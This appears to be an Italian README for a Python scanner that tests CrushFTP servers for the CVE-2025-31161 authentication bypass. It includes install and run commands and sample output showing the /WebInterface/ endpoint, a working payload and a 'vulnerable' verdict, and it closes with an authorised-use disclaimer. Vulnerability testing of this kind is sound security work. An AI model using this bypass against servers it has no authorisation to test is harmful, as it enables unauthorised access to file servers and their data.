
Scansiona il target per vedere se è vulnerabile a CVE-2025-31161
Uno strumento Python per rilevare e testare la vulnerabilità CVE-2025-31161 nei server CrushFTP.
Questo script testa la vulnerabilità di elusione dell'autenticazione (CVE-2025-31161) nei server CrushFTP che consente a un attaccante remoto di autenticarsi senza credenziali valide manipolando l'header HTTP Authorization.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
Inserisci l'indirizzo IP del target: 192.168.1.100
Inserisci la porta del target [8080]: 8080
==================================================
📡 Test: /WebInterface/
🔑 Payload: 'A'
📊 Stato: 200
🎉 VULNERABILITÀ CONFERMATA
💡 200 OK con contenuto: dashboard, main
✅ Payload funzionante: 'A'
==================================================
🎯 Target: 192.168.1.100:8080
🔴 STATO VULNERABILITÀ: VULNERABILE
💥 Elusione autenticazione CVE-2025-31161 CONFERMATA
✅ Payload funzionanti:
==================================================
Questo strumento è solo per scopi educativi e di test autorizzati. Usalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione.